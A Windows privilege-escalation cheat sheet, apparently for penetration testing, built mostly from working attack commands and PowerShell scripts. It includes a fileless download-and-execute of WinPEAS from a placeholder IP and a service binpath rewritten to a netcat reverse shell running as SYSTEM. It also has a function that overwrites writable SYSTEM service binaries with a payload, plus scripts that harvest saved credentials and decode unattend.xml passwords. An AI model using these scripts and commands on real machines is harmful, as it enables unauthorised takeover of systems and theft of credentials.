# Windows PrivEsc

From a low-privileged user to `NT AUTHORITY\SYSTEM`.

## 1. Automated Enumeration (WinPEAS)

The #1 tool. If you are not running it, you are wasting time.

* **Running it**:

  ```powershell
  # In memory (fileless): fetch the .NET assembly and call its entry point through
  # reflection. `iex` does not work on an .exe, it only evaluates PowerShell text.
  $wp=[System.Reflection.Assembly]::Load([byte[]](New-Object Net.WebClient).DownloadData('http://<IP>/winPEASx64.exe')); [winPEAS.Program]::Main("")

  # From disk (the redirected output keeps its ANSI colour codes)
  .\winPEASx64.exe > output.txt
  ```
* **What to look for**:
  * Text in **red**: what WinPEAS considers a misconfiguration or a dangerous permission. Treat it as a lead to confirm by hand, not as a certainty.
  * *Unquoted Service Paths*.
  * *AlwaysInstallElevated* (both the HKLM and the HKCU value must be 1).
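
Two of those leads can be confirmed without WinPEAS. The PowerShell below is an added example written for this page, not code from the original page or from the PEASS project: `Test-WritableDir` probes a directory by writing and deleting a temporary file, and the path parsing assumes the service executable ends in `.exe`.

```powershell
# Added example: manually confirm two WinPEAS leads (AlwaysInstallElevated and
# unquoted service paths). Run as the low-privileged user on the target.

function Test-AlwaysInstallElevated {
    # Only exploitable when BOTH the machine and the user policy value are 1;
    # then any .msi (e.g. one built with msfvenom) installs as SYSTEM.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        try   { (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction Stop).AlwaysInstallElevated }
        catch { 0 }   # key or value missing counts as "not set"
    }
    return (@($values | Where-Object { $_ -ne 1 }).Count -eq 0)
}

function Test-WritableDir([string]$Dir) {
    # Probes by creating and deleting a random file (side effect: one short-lived file).
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try   { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; return $true }
    catch { return $false }
}

function Get-UnquotedServicePath {
    # An unquoted PathName containing spaces makes the SCM try C:\Program.exe,
    # "C:\Program Files\Some.exe", ... before the real binary. Each candidate whose
    # directory we can write to is a hijack point; services under C:\Windows are skipped.
    Get-CimInstance Win32_Service |
      Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and
                     $_.PathName -match ' ' -and $_.PathName -notmatch '^C:\\Windows\\' } |
      ForEach-Object {
        $exe   = ($_.PathName -split '\.exe')[0] + '.exe'   # drop arguments (assumes a .exe)
        $parts = $exe -split ' '
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        [pscustomobject]@{
            Name       = $_.Name
            RunsAs     = $_.StartName
            PathName   = $_.PathName
            Hijackable = @($candidates | Where-Object { Test-WritableDir (Split-Path -Path $_ -Parent) })
        }
      }
}

"AlwaysInstallElevated exploitable: $(Test-AlwaysInstallElevated)"
Get-UnquotedServicePath | Where-Object { $_.Hijackable.Count -gt 0 } | Format-List
```

A service only shows up as hijackable when one of the intermediate directories is writable; the `RunsAs` column tells you whether winning the race actually gets you SYSTEM or just another service account.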

## 2. Kernel Exploits (the old reliable)

If the box is old (Server 2008/2012, Windows 7/8) and behind on patches, look for kernel and other local exploits.

1. `systeminfo`: save the output (`systeminfo > systeminfo.txt`) and copy it to your machine.
2. `windows-exploit-suggester.py`: analyse it offline. Run `python windows-exploit-suggester.py --update` once, then `python windows-exploit-suggester.py --database <date>-mssb.xls --systeminfo systeminfo.txt`. It only compares the listed hotfixes against the bulletin database, so a "missing" KB is a lead, not a confirmed hole: check the exact build and test in a lab first, because a failed kernel exploit usually blue-screens the box. The bulletin database ends in 2017; for newer hosts use its successor wesng (`wes.py --update`, then `wes.py systeminfo.txt`).
3. **Common exploits**:
   * MS17-010 (EternalBlue): SMBv1 kernel bug (srv.sys), triggered over the network and gives SYSTEM directly.
   * MS16-032 (Secondary Logon): local, abuses handle leaks in the Secondary Logon service to get a SYSTEM token.
   * PrintNightmare (CVE-2021-1675 / CVE-2021-34527): a Print Spooler bug rather than a kernel one, but it also gives local SYSTEM on unpatched hosts via a malicious printer driver.

## 3. Service Abuse (Misconfigurations)

If a service runs as SYSTEM and you can modify its binary, its configuration or a directory on its (unquoted) path, you can make it run your code. You also need to restart it (`SERVICE_STOP`/`SERVICE_START`), or wait for a reboot if it starts automatically.

* **Accesschk** (Sysinternals): `accesschk.exe -uwcqv "Authenticated Users" *` lists the services Authenticated Users can write to (`-c` services, `-w` write access, `-u` hide errors, `-q` no banner, `-v` verbose). Repeat with `Everyone`, `Users` and your own account; `SERVICE_CHANGE_CONFIG` or `SERVICE_ALL_ACCESS` is what you want. Check the binary and its folder too: `accesschk.exe -uwqv "Users" "C:\path\to\service.exe"`.
* **Binary path change** (needs `SERVICE_CHANGE_CONFIG`; the space after `binpath=` is mandatory):

  ```cmd
  :: Note the current binPath so you can put it back afterwards
  sc qc <Service>
  sc config <Service> binpath= "C:\path\to\nc.exe -e cmd <IP> 443"
  sc stop <Service>
  sc start <Service>
  ```

  `sc start` reports error 1053 after about 30 seconds because `nc` never talks to the Service Control Manager; by then the reverse shell has already been spawned as SYSTEM.
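
To find candidates and carry out the hijack from PowerShell, here is an added example (mine, not the page's commands or any tool's code). The service name `VulnSvc`, its path and the payload `rev.exe` are hypothetical; the ACL check only looks at Allow entries for your user and groups and ignores Deny entries, so confirm a hit with accesschk before acting on it.

```powershell
# Added example: find services running as SYSTEM whose executable the current
# user may overwrite, then hijack one while keeping a backup of the original.
$me        = [Security.Principal.WindowsIdentity]::GetCurrent()
$mySids    = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
$writeMask = [Security.AccessControl.FileSystemRights]'WriteData, AppendData, Modify, FullControl'

function Test-WritableByMe([string]$Path) {
    # Allow ACEs for the current user or one of its groups with any write bit.
    # Deny ACEs are ignored: verify with accesschk (or by copying) before relying on it.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.GetAccessRules($true, $true, [Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $mySids -contains $ace.IdentityReference.Value -and
            ([int]($ace.FileSystemRights -band $writeMask)) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceExecutable([string]$PathName) {
    # "C:\dir\svc.exe" -arg  ->  C:\dir\svc.exe ;  C:\dir\svc.exe -arg  ->  same
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\.exe')[0] + '.exe'
}

function Get-WritableSystemServiceBinary {
    Get-CimInstance Win32_Service |
      Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
      ForEach-Object {
        $exe = Get-ServiceExecutable $_.PathName
        if ((Test-Path -LiteralPath $exe) -and (Test-WritableByMe $exe)) {
            [pscustomobject]@{ Name = $_.Name; Exe = $exe; State = $_.State; StartMode = $_.StartMode }
        }
      }
}

function Invoke-ServiceBinaryHijack([string]$Name, [string]$Exe, [string]$Payload) {
    # Needs SERVICE_STOP/SERVICE_START on the service. Without them a manual-start
    # service is useless and an auto-start one only fires at the next reboot.
    if ((Get-Service -Name $Name).Status -eq 'Running') { Stop-Service -Name $Name -Force -ErrorAction Stop }
    Copy-Item -LiteralPath $Exe -Destination "$Exe.bak" -Force     # keep the original for cleanup
    Copy-Item -LiteralPath $Payload -Destination $Exe -Force
    # A plain reverse-shell binary never reports to the SCM, so Start-Service fails
    # with error 1053 after ~30 s; the payload has already run as SYSTEM by then.
    Start-Service -Name $Name -ErrorAction SilentlyContinue
}

Get-WritableSystemServiceBinary | Format-Table -AutoSize
# Hypothetical names:
# Invoke-ServiceBinaryHijack -Name 'VulnSvc' -Exe 'C:\Apps\VulnSvc\svc.exe' -Payload 'C:\Users\Public\rev.exe'
```

Restore `svc.exe` from the `.bak` copy once you have your SYSTEM shell; a service that keeps failing to start is the first thing a defender notices.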

## 4. Token Impersonation (SeImpersonatePrivilege)

Check `whoami /priv`. If `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` is listed (typical for IIS, MSSQL and other service accounts; "Disabled" is fine, the tools enable it themselves), the "Potato" family turns it into SYSTEM by coercing a SYSTEM process into authenticating to you and impersonating its token.

* **Tools**:
  * `PrintSpoofer.exe -i -c cmd`: Windows 10 and Server 2016/2019; needs the Print Spooler service running. `-i` attaches to the current console, `-c` is the command to run.
  * `JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c <command>" -t * -c {CLSID}`: Server 2008/2012/2016 and Windows 10 up to 1803; broken from Windows 10 1809 / Server 2019 onwards. `-c` needs a CLSID valid for that OS version, `-l` is the local COM listener port, `-t *` tries both process-creation APIs.
  * `GodPotato -cmd "cmd /c whoami"`: modern hosts (Windows 8 to 11, Server 2012 to 2022) where the older Potatoes no longer work.

## 5. Passwords in Registry/Files

Sometimes admins leave credentials in clear text.

* `reg query HKLM /f password /t REG_SZ /s` (repeat with `HKCU`): recursive search of string values whose key, name or data contains "password".
* `findstr /si password *.txt *.ini *.config`: `/s` recurses from the current directory, `/i` ignores case. Run it from `C:\` or from the web root, not just from your home folder.
* Classic spots: `C:\Windows\Panther\Unattend.xml`, `C:\Windows\System32\sysprep\sysprep.xml`, `web.config` under `C:\inetpub`, PowerShell history (`%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`) and `cmdkey /list` for saved Windows credentials (usable with `runas /savecred`).
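
An added PowerShell version of the same hunt that also covers a few well-known locations (Winlogon autologon, PuTTY sessions, unattend/sysprep answer files). This is my example, not the page's commands; the pattern list and the search roots are my choices and should be tuned per target.

```powershell
# Added example: credential hunting beyond the two one-liners above.
# Patterns and roots are illustrative choices; adjust them per target.
$patterns = 'password\s*[=:]', 'pwd\s*[=:]', 'connectionString', 'PRIVATE KEY'
$fileMask = '*.txt', '*.ini', '*.config', '*.xml', '*.ps1', '*.bat', '*.cmd', '*.json', '*.yml'
$roots    = "$env:USERPROFILE", 'C:\inetpub', 'C:\Windows\Panther', 'C:\Windows\System32\sysprep'

function Get-RegistryCredentialLeads {
    # Winlogon autologon keeps DefaultPassword in clear text when configured
    $wl = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($wl -and $wl.DefaultPassword) {
        [pscustomobject]@{ Source = 'Winlogon'; Account = "$($wl.DefaultDomainName)\$($wl.DefaultUserName)"; Secret = $wl.DefaultPassword }
    }
    # Saved PuTTY sessions may include proxy credentials (and private-key paths)
    Get-ChildItem 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue | ForEach-Object {
        $s = Get-ItemProperty -Path $_.PSPath
        if ($s.ProxyPassword) {
            [pscustomobject]@{ Source = "PuTTY:$($_.PSChildName)"; Account = "$($s.ProxyUsername)@$($s.HostName)"; Secret = $s.ProxyPassword }
        }
    }
}

function Find-CredentialStrings {
    # Recursive, case-insensitive grep returning file, line number and the matching line
    Get-ChildItem -Path $roots -Include $fileMask -Recurse -File -Force -ErrorAction SilentlyContinue |
      Select-String -Pattern $patterns -ErrorAction SilentlyContinue |
      Select-Object Path, LineNumber, @{ n = 'Match'; e = { $_.Line.Trim() } }
}

function ConvertFrom-UnattendPassword([string]$Base64) {
    # Unattend.xml / sysprep.xml store Base64(UTF-16LE(password + "Password"))
    # unless <PlainText>true</PlainText>; strip the suffix to get the real value.
    $s = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
    if ($s.EndsWith('Password')) { $s.Substring(0, $s.Length - 8) } else { $s }
}

Get-RegistryCredentialLeads | Format-Table -AutoSize
Find-CredentialStrings | Format-Table -AutoSize
```

Feed any `<Value>` you find inside an `<AutoLogon>` or `<AdministratorPassword>` block of an answer file to `ConvertFrom-UnattendPassword`; the Base64 is an encoding, not encryption, so the account password comes straight back out.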

